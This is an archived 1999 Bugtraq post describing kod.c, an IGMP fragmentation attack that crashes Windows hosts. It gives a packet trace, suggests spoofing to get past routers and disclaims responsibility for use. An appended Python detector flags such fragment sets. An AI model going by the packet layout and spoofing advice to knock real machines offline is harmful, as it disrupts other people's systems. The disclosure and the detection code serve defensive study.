Bugtraq mailing list archives
more detail and summary of kod.c (igmp bug for windows)
From: klepto () LEVITATE NET (klepto)
Date: Thu, 15 Jul 1999 00:32:08 -0500
Ok, here we go again.. For those who are having trouble with kod, a lot of you are using a very old version which was the first I submitted. Inserted is the latest version which should work. I wrote kod.c aka cherrycoke.c about 3-4 months ago. It sends a fragmented igmp packet to a Windows client that states that it is not fragmented but there are more frags to come; Windows assembles the packets and dies trying. Here is a dump of the packet if you want to rewrite it.

/* output via tcpdump or windump95
63.66.66.44 > 24.128.158.18: igmp-2 [v0][|igmp] (frag 52242:1480@0+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@1480+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@2960+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@4440+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@5920+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@7400+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@8880+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@10360+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@11840+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@13320+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:1480@14800+) (ttl 128)
63.66.66.44 > 24.128.158.18: (frag 52242:120@16280) (ttl 128)
*/

::notice the last frag, it changed length.. I have also ported kod to Windows, please email me if you want a copy of it.
As far as I can tell, due to my exhaustive research on the subject, it works on 95/98/98se/2k (some betas). Friends of mine such as defile/nyt/ignitor/etc have rewritten kod to suit their needs.. I have tested kod.c out a lot on many machines and it works 85% of the time for me. There are circumstances as to why kod doesn't always work: some routers may drop igmp packets if the source isn't local, so try spoofing =). As far as I can see netcom and a lot of .ca servers drop the kod packets. So please don't bark at me =) I just found the bug, wrote the code and what you do with it is your concern =).

Patch: (no hotfix currently) If you want to protect yourself from kod.c I suggest you get winroute from www.winroute.com, get version 4.. It automatically drops igmp packets incoming and outgoing ha =) It is also a very good portmapper/NAT firewall/ip masqer as well..

Shoutouts: amputee/ignitor/nizda/antibyte/codelogic/ill`/chord/cheesebal/traveler/winx/naz/dist/mrcide/etc... (gotta give shoutouts)

hasta,
klepto@Efnet or klepto () levitate net
de omnibus dubitandum
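The fragment trace above is the kind of thing a capture-side monitor can flag without ever reassembling the datagram: IGMP messages are a handful of bytes and never legitimately arrive fragmented, and a fragment set whose "more fragments" flags disagree with its offsets is malformed. The script below is an added defensive example, not kod.c or anything from the post; it parses tcpdump's "(frag ID:LEN@OFFSET+)" notation over a constructed trace that mirrors the sizes and offsets in the dump, and reports fragmented IGMP, gaps/overlaps, MF inconsistencies and oversize totals.

```python
import re
from collections import defaultdict

# Constructed sample (same sizes/offsets as the post's dump): 11 x 1480-byte
# fragments with MF set ("+"), then a 120-byte tail at offset 16280.
SAMPLE_TRACE = (
    ["63.66.66.44 > 24.128.158.18: igmp-2 [v0][|igmp] (frag 52242:1480@0+) (ttl 128)"]
    + [f"63.66.66.44 > 24.128.158.18: (frag 52242:1480@{o}+) (ttl 128)"
       for o in range(1480, 16280, 1480)]
    + ["63.66.66.44 > 24.128.158.18: (frag 52242:120@16280) (ttl 128)"]
)

# tcpdump prints fragments as "(frag ID:LEN@OFFSET+)"; the "+" means MF is set.
FRAG_RE = re.compile(r"(\S+) > (\S+): (.*?)\(frag (\d+):(\d+)@(\d+)(\+?)\)")

def parse_fragments(lines):
    """Group fragment records by (src, dst, ip_id); only fragment 0 names the protocol."""
    sets = defaultdict(lambda: {"proto": None, "frags": []})
    for line in lines:
        m = FRAG_RE.search(line)
        if not m:
            continue
        src, dst, proto_text, ip_id, length, offset, more = m.groups()
        entry = sets[(src, dst, int(ip_id))]
        if proto_text.strip().startswith("igmp"):
            entry["proto"] = "igmp"
        entry["frags"].append((int(offset), int(length), more == "+"))
    return sets

def analyse(frags, proto):
    """Return a report for one fragment set without reassembling any payload."""
    findings = []
    frags = sorted(frags)
    if proto == "igmp" and len(frags) > 1:
        findings.append("fragmented-igmp")  # IGMP never needs more than one packet
    expected = 0
    for offset, length, _ in frags:
        if offset != expected:          # hole or overlap in the offset sequence
            findings.append("gap-or-overlap")
        expected = offset + length
    # Only the final fragment may clear MF; MF clear earlier, or set last, is malformed.
    if any(not f[2] for f in frags[:-1]) or frags[-1][2]:
        findings.append("inconsistent-mf")
    total = frags[-1][0] + frags[-1][1]
    if total > 65535:                   # would exceed the maximum IP datagram size
        findings.append("oversize-datagram")
    return {"fragments": len(frags), "total_length": total, "findings": findings}

def analyse_trace(lines):
    return {k: analyse(e["frags"], e["proto"]) for k, e in parse_fragments(lines).items()}
```

Running `analyse_trace(SAMPLE_TRACE)` on the constructed trace reports 12 fragments totalling 16400 bytes with the single finding "fragmented-igmp", which is the cheap signal a border filter or IDS rule can key on.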